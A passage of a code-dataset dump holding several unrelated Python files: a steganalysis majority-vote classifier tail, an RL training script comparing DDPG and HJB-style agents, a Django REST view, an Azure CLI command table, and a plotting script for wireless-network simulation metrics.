for chosen file\n features = [getFeatures(filename)]\n\n preds = []\n\n # Let each model make a prediction\n try:\n for model in models:\n preds.append(model.predict(features))\n except ValueError:\n return -1\n\n cover_count = 0\n steg_count = 0\n for pred in preds:\n if pred[0] == 1:\n steg_count += 1\n else:\n cover_count += 1\n\n # Assign a label based on majority vote\n if cover_count > steg_count:\n return 0\n else:\n return 1\n","sub_path":"Final Model/steganalysisfunc.py","file_name":"steganalysisfunc.py","file_ext":"py","file_size_in_byte":4038,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"206619585","text":"import torch\nimport wandb\n\nimport random\nimport numpy as np\n\nfrom training.env import Env\nfrom training.models import Model, DeterministicPolicy, QNetwork\nfrom training.storage import Storage\n\n\ndevice = 'cuda:0' if torch.cuda.is_available() else 'cpu'\n\n\ndef batch_dot(x, y):\n vector_len = x.shape[1]\n return torch.bmm(x.view(-1, 1, vector_len), y.view(-1, vector_len, 1)).view(-1, 1)\n\n\ndef batch_grad(fn, *inputs):\n for inp in inputs:\n inp.requires_grad = True\n out = fn(*inputs)\n out.backward(torch.ones_like(out).to(device))\n\n if len(inputs) == 1:\n return inputs[0].grad\n return [inp.grad for inp in inputs]\n\n\ndef explore(timesteps, env, storage):\n s = env.reset()\n for _ in range(timesteps):\n a = env.random_action()\n s2, c, done = env.step(a)\n storage.store((s, a, c, s2, done))\n s = env.reset() if done else s2\n\n\nclass ddpgAgent:\n def __init__(self, taylor_coef):\n pass\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q, s, a)\n with torch.no_grad():\n q_target = c + 0.99 * m * self.Q.target(s2, self.policy.target(s2))\n q_loss = ((q_target - self.Q(s, a)) ** 2).mean()\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\nclass regularizationAgent:\n def __init__(self, taylor_coef):\n self.taylor_coef = taylor_coef\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q, s, a)\n with torch.no_grad():\n q_target = c + 0.99 * m * self.Q.target(s2, self.policy.target(s2))\n taylor_future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-a, a_grad)\n taylor_target = c + 0.99 * m * taylor_future\n mse = ((q_target - self.Q(s, a)) ** 2).mean()\n 
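# (added note) taylor_future is the first-order Taylor change of Q along the\n        # observed transition, built from batch_dot of the state/action deltas with\n        # s_grad and a_grad, so taylor_target plays the role of a linearized Bellman\n        # backup; the taylor_reg term below penalizes Q estimates that disagree with it.\n        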
taylor_reg = ((taylor_target - self.Q(s,a)) ** 2).mean()\n\n q_loss = mse + (self.taylor_coef * taylor_reg)\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\nclass hjbAgent:\n def __init__(self, taylor_coef):\n pass\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q.target, s, a)\n with torch.no_grad():\n # future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-self.policy.target(s), a_grad)\n future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-a, a_grad)\n q_target = c + self.Q.target(s,a) + m * 0.99 * future\n q_loss = ((q_target - self.Q(s, a)) ** 2).mean()\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\nclass hjbGreedyAgent:\n def __init__(self, taylor_coef):\n pass\n\n def create_models(self, lr, n_s, n_a, action_space):\n self.policy = Model(DeterministicPolicy, lr, n_s, n_a, action_space, device, target=True)\n self.Q = Model(QNetwork, lr, n_s, n_a, target=True)\n\n def interact(self, s, env, noise):\n a = self.policy(s)\n a = (a + torch.randn_like(a) * noise).clamp(env.action_space.low[0], env.action_space.high[0])\n s2, c, done = env.step(a)\n return s, a, c, s2, done\n\n def update(self, storage, batch_size):\n s, a, c, s2, done = storage.sample(batch_size)\n m = 1 - done\n\n # improve Q function estimator\n s_grad, a_grad = batch_grad(self.Q, s, a)\n with torch.no_grad():\n future = batch_dot(s2-s, s_grad) + batch_dot(self.policy.target(s2)-a, a_grad)\n q_target = c + self.Q.target(s,a) + m * 0.99 * future\n q_loss = ((q_target - self.Q(s, a)) ** 2).mean()\n self.Q.minimize(q_loss)\n\n # improve policy\n policy_loss = self.Q(s, self.policy(s)).mean()\n self.policy.minimize(policy_loss)\n\n # update target networks\n self.Q.soft_update_target()\n self.policy.soft_update_target()\n\n\ndef train(algo, env_name, num_timesteps, lr, noise, batch_size, vis_iter, seed=0, log=False, taylor_coef=0.5):\n torch.manual_seed(seed)\n random.seed(seed)\n np.random.seed(seed)\n\n # create env and models\n env = Env(env_name, seed=seed)\n\n # set up algo\n n_s = env.state_dim()\n n_a = env.action_dim()\n algo = algo(taylor_coef)\n algo.create_models(lr, n_s, n_a, env.action_space)\n\n # create storage and add random transitions to it\n storage = Storage(1e6)\n explore(10000, env, storage)\n\n # training loop\n last_ep_cost = 0\n ep_cost = 0\n\n s = env.reset()\n for step in range(int(num_timesteps)):\n # interact with env\n with torch.no_grad():\n s, a, c, s2, done = algo.interact(s, env, noise)\n storage.store((s, a, c, s2, done))\n\n # cost bookkeeping\n ep_cost += c.item()\n\n # algo update\n algo.update(storage, batch_size)\n\n # transition to next state + cost bookkeeping\n 
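# (added) last_ep_cost holds the total cost of the most recently *completed*\n        # episode, so the periodic report below never logs a partial episode.\n        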
if done:\n            s = env.reset()\n            last_ep_cost = ep_cost\n            ep_cost = 0\n        else:\n            s = s2\n\n        # report progress\n        if step % vis_iter == vis_iter - 1:\n            if log:\n                wandb.log({'Average episodic cost': last_ep_cost}, step=step)\n            else:\n                print(f'Step: {step} | Cost: {last_ep_cost}')\n\n\nif __name__ == '__main__':\n    algos = {\n        'ddpg': ddpgAgent,\n        'reg': regularizationAgent,\n        'hjb': hjbAgent,\n        'hjb-greedy': hjbGreedyAgent\n    }\n\n    defaults = dict(\n        algo = 'ddpg',\n        env = 'InvertedPendulumPyBulletEnv-v0',\n        seed = 3458,\n        lr = 3e-4,\n        noise = 0.15,\n        timesteps = 4e6,\n        batch = 128,\n        taylor = 0.1,\n        vis_iter = 200\n    )\n    #! CHANGE TIMESTEPS BACK TO 1 MIL\n\n    #! REDO THE ANT ENVIRONMENT WITH EXTRA TIMESTEPS\n\n    # * for taylor_coef sweeps\n    # for seed in defaults['seed']:\n    #     wandb.init(project=f'Continuity', group=f'{env}', name=f'{seed}-{taylor}', config=defaults, reinit=True)\n    #     config = wandb.config\n    #     train(algo=Agent, env_name=config.env, num_timesteps=config.timesteps, lr=config.lr, noise=config.noise, batch_size=config.batch, vis_iter=200, seed=seed, log=True, taylor_coef=config.taylor)\n\n    # * for seed sweeps\n    wandb.init(project=f'big-papa-HJB', config=defaults)\n    config = wandb.config\n    train(\n        algo=algos[config.algo],\n        env_name=config.env,\n        num_timesteps=config.timesteps,\n        lr=config.lr,\n        noise=config.noise,\n        batch_size=config.batch,\n        vis_iter=config.vis_iter,\n        seed=config.seed,\n        log=True,\n        taylor_coef=config.taylor\n    )\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8857,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"168421881","text":"from django.shortcuts import render\nfrom .models import ProjectUrl, ProjectUrlItems\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response  # added: Response was used below but never imported\nfrom .serializers import ProjectSerializer, ProjectUrlSerializer\n\n\nclass ProjectUrlApiView(APIView):\n\n    def get(self,request,*args,**kwargs):\n        return Response(status=200)\n\n    def post(self, request,*args,**kwargs):\n        print('the data',self.request.data)\n        serializer = ProjectUrlSerializer(data=request.data)\n        if serializer.is_valid(raise_exception=True):\n            serializer.save()\n            print(serializer.data)\n            # echo the submitted form data back to the javascript client as\n            # JSON with status 201\n            return Response(serializer.data, status=201)\n        return Response({}, status=400)\n\n\ndef project_url__create_view(request, *args, **kwargs):\n    # read the submitted fields from the request; the original assigned\n    # undefined names to themselves (e.g. ``image = image``) and called the\n    # non-callable ``request.data()``\n    data = request.POST\n    user = request.user\n    name = data.get('name')\n    image = data.get('image')\n    detail = data.get('detail')\n    url = data.get('url')\n    project_url, created = ProjectUrl.objects.get_or_create(\n        user=user, name=name)\n    project_url_item = ProjectUrlItems.objects.create(user=user,\n                                                      image=image,\n                                                      detail=detail,\n                                                      url=url)\n    project_url_qs = ProjectUrl.objects.filter(user=user, name=name)\n    if project_url_qs.exists():\n        project_url = project_url_qs[0]\n        project_url.project_url_item.add(project_url_item)\n    return None\n\n\n","sub_path":"home/portfolio/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1566,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"}
{"seq_id":"538905013","text":"# --------------------------------------------------------------------------\n# Copyright (c) Microsoft Corporation. All rights reserved.\n# Licensed under the MIT License. 
See License.txt in the project root for\n# license information.\n#\n# Code generated by Microsoft (R) AutoRest Code Generator.\n# Changes may cause incorrect behavior and will be lost if the code is\n# regenerated.\n# --------------------------------------------------------------------------\n\nfrom azure.cli.core.commands import CliCommandType\n\n\ndef load_command_table(self, _):\n\n from azext_healthcareapis.generated._client_factory import cf_service\n healthcareapis_service = CliCommandType(\n operations_tmpl='azext_healthcareapis.vendored_sdks.healthcareapis.operations._service_operations#ServiceOperat'\n 'ions.{}',\n client_factory=cf_service)\n with self.command_group('healthcareapis service', healthcareapis_service, client_factory=cf_service,\n is_experimental=True) as g:\n g.custom_command('list', 'healthcareapis_service_list')\n g.custom_show_command('show', 'healthcareapis_service_show')\n g.custom_command('create', 'healthcareapis_service_create', supports_no_wait=True)\n g.custom_command('update', 'healthcareapis_service_update', supports_no_wait=True)\n g.custom_command('delete', 'healthcareapis_service_delete', supports_no_wait=True)\n\n from azext_healthcareapis.generated._client_factory import cf_operation_result\n healthcareapis_operation_result = CliCommandType(\n operations_tmpl='azext_healthcareapis.vendored_sdks.healthcareapis.operations._operation_result_operations#Oper'\n 'ationResultOperations.{}',\n client_factory=cf_operation_result)\n with self.command_group('healthcareapis operation-result', healthcareapis_operation_result,\n client_factory=cf_operation_result, is_experimental=True) as g:\n g.custom_show_command('show', 'healthcareapis_operation_result_show')\n","sub_path":"src/healthcareapis/azext_healthcareapis/generated/commands.py","file_name":"commands.py","file_ext":"py","file_size_in_byte":2012,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"491852973","text":"#!/usr/bin/python3\n\"\"\"Module to plot data related to a single\nsimulation.\n\"\"\"\nimport math\nimport logging\nimport os\n\nimport re\nimport shutil\nimport datetime\n\nimport numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\nfrom matplotlib.backends.backend_pdf import PdfPages\n\nfrom pathlib import Path\n\nfrom parser import get_log_data\nfrom chart_config import init_matplotlib\nfrom navigator import simulation_log_iter\n\nfrom data_analysis import DAException\nfrom data_analysis import clean_data\nfrom data_analysis import get_sim_pdr, get_sim_first_relay_counter, get_sim_slot_estimation, get_sim_failed_slot_estimation\nfrom data_analysis import get_sim_epoch_estimates\nfrom data_analysis import get_sim_sync_counters\nfrom data_analysis import get_sim_trx, get_sim_flood_trx\nfrom data_analysis import get_sim_trx_errors, get_sim_trx_error_details, get_sim_pkt\n\n# -----------------------------------------------------------------------------\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(level=logging.DEBUG)\nlogging.getLogger(__name__).setLevel(level=logging.DEBUG)\n\n# higher the criticality for matplotlib logs (so to log **less**)\nmpl_logger = logging.getLogger(matplotlib.__name__)\nmpl_logger.setLevel(logging.WARNING)\n# -----------------------------------------------------------------------------\ninit_matplotlib()\n\ndef plot_pdr(nodes_pdr):\n \"\"\"\n Produce a barplot displaying the PDR for each\n node.\n \"\"\"\n x = [int(node_id) for node_id in nodes_pdr.keys()] # node ids\n x.sort()\n x = 
[str(node_id) for node_id in x]\n y = [nodes_pdr[nid] for nid in x]\n\n mean = sum(y) / len(y)\n std = math.sqrt(sum([(yi - mean)**2 for yi in y]))/len(y)\n if std < 0.000000001:\n std = 0.001\n ylim_max = 1 + std * 0.05\n ylim_min = min(y) - std\n else:\n ylim_max = 1 + std\n ylim_min = min(y) - std\n plt.bar(x, y)\n plt.ylim([ylim_min, ylim_max])\n plt.axhline(y=1, xmin=0, xmax=1, c=\"C2\")\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"PDR\")\n\ndef plot_reception_summary(pkt_tx, nodes_rx):\n str_ = \"Packets broadcast: {}\\n\\n\".format(pkt_tx)\n for nid in sorted([int(i) for i in nodes_rx]):\n str_ += \"Node {}: {}\\n\".format(str(nid).zfill(2),\\\n nodes_rx[str(nid)])\n plt.axes([0.01, 0.01, 0.98, 0.90], facecolor=\"white\", frameon=True)\n axis = plt.gca()\n axis.set_xlim(0., 1.)\n axis.set_ylim(0., 1.)\n axis.set_ylabel(\"Summary\", visible=False)\n axis.set_xlabel(\"Nodes\", visible=False)\n axis.set_xticklabels(\"\", visible=False)\n axis.set_yticklabels(\"\", visible=False)\n axis.grid(False)\n plt.annotate(str_, xy=(0.5, 0.2), ha=\"center\", fontsize=12)\n plt.title(\"Summary:\")\n\ndef plot_first_relay_counter(nodes_frelay):\n \"\"\"Produce a box blot of the values\n assumed by the first relay counter during across\n the considered floods.\"\"\"\n\n x = [int(nid) for nid in nodes_frelay.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n y = [nodes_frelay[nid] for nid in x] # relay counters\n\n plt.boxplot(y, showfliers=True, whis=[1,99])\n locs, labels = plt.xticks()\n plt.xticks(locs, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"First relay counter\")\n return x,y\n\ndef plot_failed_slot_estimation(nodes_nfailures):\n \"\"\"Produce a boxplot showing how many times a node failed to\n estimate the slot (producing 0 as estimation).\n \"\"\"\n x = [int(nid) for nid in nodes_nfailures.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n y = [nodes_nfailures[nid] for nid in x]\n\n ind = np.arange(len(y))\n plt.bar(ind, y)\n plt.xticks(ind, x, rotation=90)\n plt.xlabel(\"Nodes\")\n plt.ylabel(\"# Failed estimations\")\n return x,y\n\ndef plot_slot_estimation(nodes_estimates, fliers=False):\n \"\"\"Produce a boxplot showing the values assumed by the\n slot estimation across floods, by each node.\n\n NOTE:\n -----\n Slot values are given with the transceiver precision, where\n 1 unit corresponds to 31ns.\n To note this, the y label of this chart reports\n a \"x31 ns\".\n\n 1 DWT_TU ~= 31ns\n \"\"\"\n x = [int(nid) for nid in nodes_estimates.keys()] # node ids\n x.sort()\n x = [str(nid) for nid in x]\n y = [nodes_estimates[nid] for nid in x]\n\n plt.boxplot(y, showfliers=fliers, autorange=True)\n locs, labels = plt.xticks()\n plt.xticks(locs, x)\n plt.xlabel(\"Nodes\")\n plt.ylabel(r\"Slot estimation ($\\times 31$ ns)\")\n return x,y\n\ndef plot_flood_trx(nodes_tx, nodes_rx):\n \"\"\"Plot number of transmission and reception at each flood,\n showing possible variations in their distributions.\n \"\"\"\n # compute mean value and std of ntx and trx\n mean_tx = {node : np.mean(floods_tx) for node, floods_tx in nodes_tx.items()}\n mean_rx = {node : np.mean(floods_rx) for node, floods_rx in nodes_rx.items()}\n\n std_tx = {node : np.std(floods_tx) for node, floods_tx in nodes_tx.items()}\n std_rx = {node : np.std(floods_rx) for node, floods_rx in nodes_rx.items()}\n\n # gather everything in order\n x = [int(node_id) for node_id in nodes_tx.keys()] # node ids\n x.sort()\n x = [str(node_id) for node_id in x]\n n_tx_mean = [mean_tx[node] for node in x]\n n_tx_std = [std_tx[node] for 
node in x]\n    n_rx_mean = [mean_rx[node] for node in x]\n    n_rx_std = [std_rx[node] for node in x]\n\n    # Thanks to\n    # https://pythonforundergradengineers.com/python-matplotlib-error-bars.html\n    width = 0.35\n    ind = np.arange(len(x))\n    b1 = plt.bar(ind , n_tx_mean, yerr=[n_tx_std, np.repeat(0, len(n_tx_mean))], width=width, align='center', ecolor='black')\n    b2 = plt.bar(ind + width, n_rx_mean, yerr=[n_rx_std, np.repeat(0, len(n_rx_mean))], width=width, align='center', ecolor='black')\n    plt.xticks(ind + width / 2, x)\n    plt.xlabel(\"Nodes\")\n    plt.ylabel(\"Avg. Radio Events\")\n    plt.legend((b1[0], b2[0]), (\"Tx\", \"Rx\"), loc=\"upper center\")\n\ndef plot_trx(nodes_tx, nodes_rx):\n    \"\"\"Show total number of \"service\" packets (NOT application\n    packets) transmitted and received from each node.\n    \"\"\"\n    x = [int(nid) for nid in nodes_tx.keys()]  # node ids (fixed: was node_tx, a NameError)\n    x.sort()\n    x = [str(nid) for nid in x]\n    ntx = [nodes_tx[nid] for nid in x]\n    nrx = [nodes_rx[nid] for nid in x]\n\n    ind = np.arange(len(x))\n    width = 0.35\n    b1 = plt.bar(ind, nrx, width=width)\n    b2 = plt.bar(ind + width, ntx, width=width)\n    plt.xticks(ind + width / 2, x)\n    plt.xlabel(\"Nodes\")\n    plt.ylabel(\"Avg. Radio Events\")\n    plt.legend((b1[0], b2[0]), (\"Rx\", \"Tx\"), loc=\"lower left\")\n\ndef plot_trx_errors(nodes_nerrs, nodes_nbad_pkt):\n    \"\"\"Plot the number of transmission and reception\n    errors, besides the number of bad packet errors.\n\n    * # transmission errors is given by\n      # RX errors + # TIMEOUTS errors\n\n    * # bad packet errors is given by\n      # BAD_LEN + # BAD HEADER + # BAD PAYLOAD\n    \"\"\"\n    x = [int(node_id) for node_id in nodes_nerrs.keys()]  # node ids\n    x.sort()\n    x = [str(node_id) for node_id in x]\n    nerr = [nodes_nerrs[nid] for nid in x]\n    nbad_pkt = [nodes_nbad_pkt[nid] for nid in x]\n\n    ind = np.arange(len(x))\n    width = 0.35\n    b1 = plt.bar(ind, nerr, width=width)\n    b2 = plt.bar(ind + width, nbad_pkt, width=width)\n    plt.xticks(ind + width / 2, x, rotation=90)\n    plt.xlabel(\"Nodes\")\n    plt.ylabel(\"# errors\")\n    plt.legend((b1[0], b2[0]), (\"TRx errors\", \"Bad packets\"), loc=\"upper center\")\n\ndef plot_trx_error_details(results):\n    # reverse the keys for sorting, then restore the error names\n    err_list = [k[::-1] for k in results.keys()]\n    err_list.sort()\n    err_list = [k[::-1] for k in err_list]\n    val_list = [results[k] for k in err_list]\n    ind = np.arange(len(err_list))\n    plt.bar(ind, val_list, width=0.1)\n    plt.xticks(ind, err_list, rotation=25)\n    plt.ylabel(\"# errors\")\n\ndef plot_sync_counters(nodes_sync, nodes_desync):\n    \"\"\"Plot for each node how many times it was able to synchronize,\n    and how many times it failed to.\"\"\"\n    x = [int(node_id) for node_id in nodes_sync.keys()]  # node ids\n    x.sort()\n    x = [str(node_id) for node_id in x]\n    y1 = [nodes_sync[node_id] for node_id in x]    # nsync\n    y2 = [nodes_desync[node_id] for node_id in x]  # n_nosync\n\n    ind = np.arange(len(x))\n    width = 0.35\n    b1 = plt.bar(ind, y1, width=width)\n    b2 = plt.bar(ind + width, y2, width=width)\n    plt.xticks(ind + width / 2, x)\n    plt.xlabel(\"Nodes\")\n    plt.ylabel(\"# synchronizations\")\n    plt.legend((b1[0], b2[0]), (\"Sync\", \"No Sync\"))\n\ndef plot_epoch_estimates(nodes_epochs, fliers=False):\n    x = [int(node_id) for node_id in nodes_epochs.keys()]  # node ids\n    x.sort()\n    x = [str(node_id) for node_id in x]\n    y = [nodes_epochs[node_id] for node_id in x]\n\n    plt.boxplot(y, showfliers=fliers, autorange=True)\n    locs, labels = plt.xticks()\n    plt.xticks(locs, x, rotation=90)\n    plt.xlabel(\"Nodes\")\n    plt.ylabel(\"Epoch duration (RTimer units)\")\n
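\n# Added helper sketch (defined here but not called by the original code): most\n# plot_* functions above repeat the \"sort node ids numerically, then look the\n# values up\" pattern; a shared helper like this would remove the duplication.\ndef sorted_node_series(node_dict):\n    x = sorted(node_dict, key=int)\n    return x, [node_dict[nid] for nid in x]\n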
plt.ylabel(\"Epoch duration (RTimer units)\")\n\n# -----------------------------------------------------------------------------\n# MAIN-SCRIPT FUNCTIONS\n# -----------------------------------------------------------------------------\ndef get_current_plot_name():\n \"\"\"Return an identifier based on the x,y labels\n of the current plot.\n \"\"\"\n ax = plt.gca()\n xlabel = ax.get_xlabel()\n ylabel = ax.get_ylabel()\n # create a unique filename for the metric, describing the plot\n return str.join(\"_\", re.sub(r\"\\W+\", \" \",\\\n (xlabel + \" \" + ylabel).lower())\\\n .split())\n\ndef plot_simulation_results(sim_name, sim_log_path, format_=None, dest_path=None, overwrite=False):\n \"\"\"Plot simulation results either interactively\n or saving them to files.\n \"\"\"\n if format_ is None:\n format_ = \"\"\n if dest_path is None:\n dest_path = os.path.dirname(os.path.abspath(sim_log_path))\n\n # -------------------------------------------------------------------------\n # check how to display plots\n # -------------------------------------------------------------------------\n pdf_fh = None # multipage pdf file handler\n plot_output = None\n if format_ == \"\":\n\n # use the interactive session\n pic_out = lambda plot_name: plt.show()\n\n if format_.lower() == \"png\":\n\n # create a folder in the destination directory,\n # containing the images generated\n DEST_FOLDER = os.path.join(dest_path, \"figures_{}\".format(sim_name))\n plot_output = DEST_FOLDER\n if os.path.exists(DEST_FOLDER):\n\n if overwrite is True:\n logger.info(\"Destination directory {} already exists. Clashing .png files will be overwritten...\".format(DEST_FOLDER))\n else:\n logger.info(\"Destination directory {} already exists. Skipping computation...\".format(DEST_FOLDER))\n return\n\n else:\n os.mkdir(DEST_FOLDER)\n pic_out = lambda plot_name: plt.savefig(os.path.join(DEST_FOLDER, plot_name + \".png\"), format=\"png\", papertype=\"a4\", dpi=600)\n print(\"Printing figures to: {}\".format(DEST_FOLDER))\n\n elif format_.lower() == \"pdf-multi\":\n\n # create a multipage PDF\n DEST_PDF = os.path.join(dest_path, \"figures_multi_{}.pdf\".format(sim_name))\n plot_output = DEST_PDF\n if os.path.exists(DEST_PDF):\n if overwrite is True:\n logger.info(\"Destination file {} already exists. It will be overwritten...\".format(DEST_PDF))\n else:\n logger.info(\"Destination file {} already exists. Skipping computation...\".format(DEST_PDF))\n return\n\n metadata = {\\\n \"Title\" : \"Results for {}\".format(sim_name),\\\n \"Author\" : \"D3S lab - Unversity of Trento\",\\\n \"Subject\" : None,\\\n \"Keywords\" : \"Glossy PDR epoch hop-count tx rx error\",\\\n \"CreationDate\" : datetime.datetime.today(),\\\n \"ModDate\" : datetime.datetime.today()}\n pdf_fh = PdfPages(DEST_PDF, metadata=metadata)\n pic_out = lambda plot_filename: pdf_fh.savefig(papertype=\"a4\", dpi=600)\n print(\"Printing figures to: {}\".format(DEST_PDF))\n\n elif format_.lower() == \"pdf\":\n\n # create a folder in the destination directory,\n # containing the images generated\n DEST_FOLDER = os.path.join(dest_path, \"figures_{}\".format(sim_name))\n plot_output = DEST_FOLDER\n if os.path.exists(DEST_FOLDER):\n if overwrite is True:\n logger.info(\"Destination directory {} already exists. Clashing .pdf files will be overwritten...\".format(DEST_FOLDER))\n else:\n logger.info(\"Destination directory {} already exists. 
def plot_simulation_results(sim_name, sim_log_path, format_=None, dest_path=None, overwrite=False):\n    \"\"\"Plot simulation results either interactively\n    or saving them to files.\n    \"\"\"\n    if format_ is None:\n        format_ = \"\"\n    if dest_path is None:\n        dest_path = os.path.dirname(os.path.abspath(sim_log_path))\n\n    # -------------------------------------------------------------------------\n    # check how to display plots\n    # -------------------------------------------------------------------------\n    pdf_fh = None # multipage pdf file handler\n    plot_output = None\n    if format_ == \"\":\n\n        # use the interactive session\n        pic_out = lambda plot_name: plt.show()\n\n    elif format_.lower() == \"png\":\n\n        # create a folder in the destination directory,\n        # containing the images generated\n        DEST_FOLDER = os.path.join(dest_path, \"figures_{}\".format(sim_name))\n        plot_output = DEST_FOLDER\n        if os.path.exists(DEST_FOLDER):\n\n            if overwrite is True:\n                logger.info(\"Destination directory {} already exists. Clashing .png files will be overwritten...\".format(DEST_FOLDER))\n            else:\n                logger.info(\"Destination directory {} already exists. Skipping computation...\".format(DEST_FOLDER))\n                return\n\n        else:\n            os.mkdir(DEST_FOLDER)\n        pic_out = lambda plot_name: plt.savefig(os.path.join(DEST_FOLDER, plot_name + \".png\"), format=\"png\", papertype=\"a4\", dpi=600)\n        print(\"Printing figures to: {}\".format(DEST_FOLDER))\n\n    elif format_.lower() == \"pdf-multi\":\n\n        # create a multipage PDF\n        DEST_PDF = os.path.join(dest_path, \"figures_multi_{}.pdf\".format(sim_name))\n        plot_output = DEST_PDF\n        if os.path.exists(DEST_PDF):\n            if overwrite is True:\n                logger.info(\"Destination file {} already exists. It will be overwritten...\".format(DEST_PDF))\n            else:\n                logger.info(\"Destination file {} already exists. Skipping computation...\".format(DEST_PDF))\n                return\n\n        metadata = {\\\n            \"Title\" : \"Results for {}\".format(sim_name),\\\n            \"Author\" : \"D3S lab - University of Trento\",\\\n            \"Subject\" : None,\\\n            \"Keywords\" : \"Glossy PDR epoch hop-count tx rx error\",\\\n            \"CreationDate\" : datetime.datetime.today(),\\\n            \"ModDate\" : datetime.datetime.today()}\n        pdf_fh = PdfPages(DEST_PDF, metadata=metadata)\n        pic_out = lambda plot_filename: pdf_fh.savefig(papertype=\"a4\", dpi=600)\n        print(\"Printing figures to: {}\".format(DEST_PDF))\n\n    elif format_.lower() == \"pdf\":\n\n        # create a folder in the destination directory,\n        # containing the images generated\n        DEST_FOLDER = os.path.join(dest_path, \"figures_{}\".format(sim_name))\n        plot_output = DEST_FOLDER\n        if os.path.exists(DEST_FOLDER):\n            if overwrite is True:\n                logger.info(\"Destination directory {} already exists. Clashing .pdf files will be overwritten...\".format(DEST_FOLDER))\n            else:\n                logger.info(\"Destination directory {} already exists. Skipping computation...\".format(DEST_FOLDER))\n                return\n        else:\n            os.mkdir(DEST_FOLDER)\n        pic_out = lambda plot_name: plt.savefig(os.path.join(DEST_FOLDER, plot_name + \".pdf\"), format=\"pdf\", papertype=\"a4\", dpi=600)\n        print(\"Printing figures to: {}\".format(DEST_FOLDER))\n\n    # -------------------------------------------------------------------------\n\n    try:\n        print(\"-\"*40 + \"\\nProcessing file:\\n%s\\n\" % sim_log_path + \"-\"*40)\n        log_data = get_log_data(sim_log_path)\n        clean_data(log_data, 20)\n\n        # -------------------------------------------------------------------------\n        # PLOTTING DATA\n        # -------------------------------------------------------------------------\n\n        try:\n            pkt_tx, nodes_rx, not_received = get_sim_pkt(log_data)\n\n            # display info on the effective # packets\n            # received by each node\n            print(\"Number of packets considered: {}\".format(pkt_tx))\n            print(\"-\" * 40)\n            for nid, nrx in nodes_rx.items():\n                print(\"Node {}: {}\".format(str(nid).zfill(2), nrx))\n\n            not_received = {k:v for k,v in not_received.items() if len(v) > 0}\n            if len(not_received) > 0:\n                print(\"-\"*40 + \"\\nNOT RECEIVED\\n\" + \"-\"*40)\n                for nid, nr in not_received.items():\n                    pkts = [str(seqno) for seqno in list(nr)]\n                    missing_pkts = str.join(\", \", pkts)\n                    print(\"Id %s: %s\" % (str(nid).zfill(2), missing_pkts))\n            else:\n                print(\"Every packet has been received\")\n\n            plt.figure()\n            plt.tight_layout()\n            plot_reception_summary(pkt_tx, nodes_rx)\n            pic_out(\"summary\")\n            plt.close()\n\n            plt.figure()\n            nodes_pdr = get_sim_pdr(log_data)\n            plot_pdr(nodes_pdr)\n            plt.tight_layout()\n            plot_name = get_current_plot_name()\n            pic_out(plot_name)\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot pdr\")\n\n        try:\n            plt.figure()\n            nodes_frelay = get_sim_first_relay_counter(log_data)\n            plot_first_relay_counter(nodes_frelay)\n            plt.tight_layout()\n            plot_name = get_current_plot_name()\n            pic_out(plot_name)\n            plt.close()\n        except DAException as e:\n            raise e\n        except Exception as e:\n            logger.debug(\"Couldn't plot relay counter\")\n\n        try:\n            nodes_estimates = get_sim_slot_estimation(log_data)\n            nodes_nfailures = get_sim_failed_slot_estimation(log_data)\n            